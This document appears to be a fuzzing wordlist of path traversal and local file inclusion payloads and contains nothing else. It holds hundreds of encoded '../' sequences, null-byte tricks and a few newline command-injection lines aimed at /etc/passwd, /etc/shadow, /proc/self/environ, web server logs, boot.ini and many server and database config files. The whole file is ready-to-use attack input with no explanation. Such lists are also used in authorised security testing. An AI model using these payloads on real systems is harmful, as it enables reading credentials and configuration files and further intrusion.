%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow
%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
-/etc/pure-ftpd.conf
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//etc/passwd
....//....//etc/passwd
....//etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/etc/passwd
....\/....\/....\/etc/passwd
....\/....\/etc/passwd
....\/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../apache/logs/access.log%00
../../../../../../../../../../../../../../../apache/logs/error.log
../../../../../../../../../../../../../../../apache/logs/error.log%00
../../../../../../../../../../../../../../../apache2/logs/access.log
../../../../../../../../../../../../../../../apache2/logs/access.log%00
../../../../../../../../../../../../../../../apache2/logs/error.log
../../../../../../../../../../../../../../../apache2/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00
../../../../../../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00
../../../../../../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00
../../../../../../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00
../../../../../../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00
../../../../../../../../../../../../../../../var/log/access.log
../../../../../../../../../../../../../../../var/log/access.log%00
../../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../../var/log/access_log%00
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../../var/log/apache/access.log%00
../../../../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../../../../var/log/apache/access_log%00
../../../../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../../../../var/log/apache/error.log%00
../../../../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../../../../var/log/apache/error_log%00
../../../../../../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../../../../../../var/log/apache2/access_log%00
../../../../../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../../../../../var/log/apache2/error.log%00
../../../../../../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../../../../../../var/log/apache2/error_log%00
../../../../../../../../../../../../../../../var/log/error.log
../../../../../../../../../../../../../../../var/log/error.log%00
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../../../../../../../var/log/error_log%00
../../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../../var/log/httpd/access_log%00
../../../../../../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../../../../../../var/log/httpd/error.log%00
../../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../../var/log/httpd/error_log%00
../../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../../var/www/logs/access.log%00
../../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/access_log%00
../../../../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../../../../var/www/logs/error.log%00
../../../../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../../../../var/www/logs/error_log%00
../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/group
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../etc/group
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/security/group
../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../etc/security/user
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../etc/group
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/security/group
../../../../../../../../../../etc/security/passwd
../../../../../../../../../../etc/security/user
../../../../../../../../../../etc/shadow
../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../etc/group
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/security/group
../../../../../../../../../etc/security/passwd
../../../../../../../../../etc/security/user
../../../../../../../../../etc/shadow
../../../../../../../../../proc/self/environ
../../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/self/fd/8
../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../conf/server.xml
../../../../../../../../etc/group
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../etc/security/group
../../../../../../../../etc/security/passwd
../../../../../../../../etc/security/user
../../../../../../../../etc/shadow
../../../../../../../../proc/self/environ
../../../../../../../../proc/self/environ%00
../../../../../../../../proc/self/fd/8
../../../../../../../../proc/self/fd/8%00
../../../../../../../../var/log/httpd-access.log
../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../windows/win.ini
../../../../../../../dev
../../../../../../../etc/group
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../etc/security/group
../../../../../../../etc/security/passwd
../../../../../../../etc/security/user
../../../../../../../etc/shadow
../../../../../../../logs/access_log
../../../../../../../logs/error_log
../../../../../../../proc/self/environ
../../../../../../../proc/self/environ%00
../../../../../../../proc/self/fd/8
../../../../../../../proc/self/fd/8%00
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/httpd-access.log
../../../../../../../var/log/httpd-access.log%00
../../../../../../../var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../etc/group
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../../../../etc/security/group
../../../../../../etc/security/passwd
../../../../../../etc/security/user
../../../../../../etc/shadow
../../../../../../logs/access_log
../../../../../../logs/error_log
../../../../../../proc/self/environ
../../../../../../proc/self/environ%00
../../../../../../proc/self/fd/8
../../../../../../proc/self/fd/8%00
../../../../../../var/log/httpd-access.log
../../../../../../var/log/httpd-access.log%00
../../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../etc/group
../../../../../etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../etc/security/group
../../../../../etc/security/passwd
../../../../../etc/security/user
../../../../../etc/shadow
../../../../../logs/access.log
../../../../../logs/access_log
../../../../../logs/error.log
../../../../../logs/error_log
../../../../../proc/self/environ
../../../../../proc/self/environ%00
../../../../../proc/self/fd/8
../../../../../proc/self/fd/8%00
../../../../../usr/local/apache/logs/access.log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/error.log
../../../../../usr/local/apache/logs/error_log
../../../../../var/log/access_log
../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/error_log
../../../../../var/log/httpd-access.log
../../../../../var/log/httpd-access.log%00
../../../../../var/log/httpd/access_log
../../../../../var/log/httpd/error_log
../../../../../var/www/logs/access.log
../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../etc/group
../../../../etc/passwd
../../../../etc/passwd%00
../../../../etc/security/group
../../../../etc/security/passwd
../../../../etc/security/user
../../../../etc/shadow
../../../../logs/access.log
../../../../logs/access_log
../../../../logs/error.log
../../../../logs/error_log
../../../../proc/self/environ
../../../../proc/self/environ%00
../../../../proc/self/fd/8
../../../../proc/self/fd/8%00
../../../../var/log/httpd-access.log
../../../../var/log/httpd-access.log%00
../../../administrator/inbox
../../../apache/logs/access.log
../../../apache/logs/error.log
../../../etc/group
../../../etc/passwd
../../../etc/passwd%00
../../../etc/security/group
../../../etc/security/passwd
../../../etc/security/user
../../../etc/shadow
../../../logs/access.log
../../../logs/access_log
../../../logs/error.log
../../../proc/self/environ
../../../proc/self/environ%00
../../../proc/self/fd/8
../../../proc/self/fd/8%00
../../../var/log/httpd-access.log
../../../var/log/httpd-access.log%00
../../apache/logs/access.log
../../apache/logs/error.log
../../boot.ini
../../etc/group
../../etc/passwd
../../etc/passwd%00
../../etc/security/group
../../etc/security/passwd
../../etc/security/user
../../etc/shadow
../../logs/access.log
../../logs/access_log
../../logs/error.log
../../logs/error_log
../../proc/self/environ
../../proc/self/environ%00
../../proc/self/fd/8
../../proc/self/fd/8%00
../../var/log/httpd-access.log
../../var/log/httpd-access.log%00
../../windows/win.ini
../.htpasswd
../.pass
../.passwd
..//..//..//..//..//boot.ini
../_config.php
../_config.php%00
../apache/logs/access.log
../apache/logs/error.log
../config.asp
../config.inc.php
../config.js
../config.php
../etc/group
../etc/passwd
../etc/passwd%00
../etc/security/group
../etc/security/passwd
../etc/security/user
../etc/shadow
../install.php
../logs/access.log
../logs/access_log
../logs/error.log
../logs/error_log
../proc/self/environ
../proc/self/environ%00
../proc/self/fd/8
../proc/self/fd/8%00
../users.db.php
../var/log/httpd-access.log
../var/log/httpd-access.log%00
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/http/httpd.conf
/etc/http/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/access.conf
/etc/httpd/apache.conf
/etc/httpd/apache2.conf
/etc/httpd/conf
/etc/httpd/conf.d
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/apache.conf
/etc/httpd/conf/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/extra/httpd-ssl.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log%00
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log%00
/etc/httpd/mod_php.conf
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/init.d
/etc/init.d/apache
/etc/init.d/apache2
/etc/inittab
/etc/ipfw.conf
/etc/ipfw.rules
/etc/issue
/etc/issue.net
/etc/kbd/config
/etc/kernel-img.conf
/etc/kernel-pkg.conf
/etc/ld.so.conf
/etc/ldap/ldap.conf
/etc/lighttpd.conf
/etc/lighttpd/lighthttpd.conf
/etc/lilo.conf
/etc/login.defs
/etc/logrotate.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/lsb-release
/etc/ltrace.conf
/etc/mail/access
/etc/mail/sendmail.conf
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/mandrake-release
/etc/manpath.config
/etc/master.passwd
/etc/miredo-server.conf
/etc/miredo.conf
/etc/miredo/miredo-server.conf
/etc/miredo/miredo.conf
/etc/modprobe.d/vmware-tools.conf
/etc/modules
/etc/modules.conf
/etc/mono/1.0/machine.config
/etc/mono/2.0/machine.config
/etc/mono/2.0/web.config
/etc/mono/config
/etc/motd
/etc/mtab
/etc/mtools.conf
/etc/muddleftpd.com
/etc/muddleftpd/muddleftpd.conf
/etc/muddleftpd/muddleftpd.passwd
/etc/muddleftpd/mudlog
/etc/muddleftpd/mudlogd.conf
/etc/muddleftpd/passwd
/etc/my.cnf
/etc/my.cnf%00
/etc/my.conf
/etc/mysql/conf.d/old_passwords.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/netconfig
/etc/network/interfaces
/etc/networks
/etc/newsyslog.conf
/etc/nginx.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/npasswd
/etc/nsswitch.conf
/etc/openldap/ldap.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/etc/os-release
/etc/osxhttpd/osxhttpd.conf
/etc/pam.conf
/etc/pam.d/proftpd
/etc/passwd
/etc/passwd%00
/etc/passwd-
/etc/passwd~
/etc/password.master
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysql.ini
/etc/php.d/mysqli.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php/php.ini
/etc/php/php.ini%00
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/postfix/mydomains
/etc/postgresql/pg_hba.conf
/etc/postgresql/postgresql.conf
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/proftpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pulse/client.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb%00
/etc/pure-ftpd/putreftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/rc.conf
/etc/rc.d/rc.httpd
/etc/redhat-release
/etc/release
/etc/resolv.conf
/etc/resolvconf/update-libc.d/sendmail
/etc/rpc
/etc/samba/dhcp.conf
/etc/samba/netlogon
/etc/samba/private/smbpasswd
/etc/samba/samba.conf
/etc/samba/smb.conf
/etc/samba/smb.conf.user
/etc/samba/smbpasswd
/etc/samba/smbusers
/etc/security/access.conf
/etc/security/environ
/etc/security/environ%00
/etc/security/failedlogin
/etc/security/group
/etc/security/group%00
/etc/security/group.conf
/etc/security/lastlog
/etc/security/limits
/etc/security/limits%00
/etc/security/limits.conf
/etc/security/namespace.conf
/etc/security/opasswd
/etc/security/pam_env.conf
/etc/security/passwd
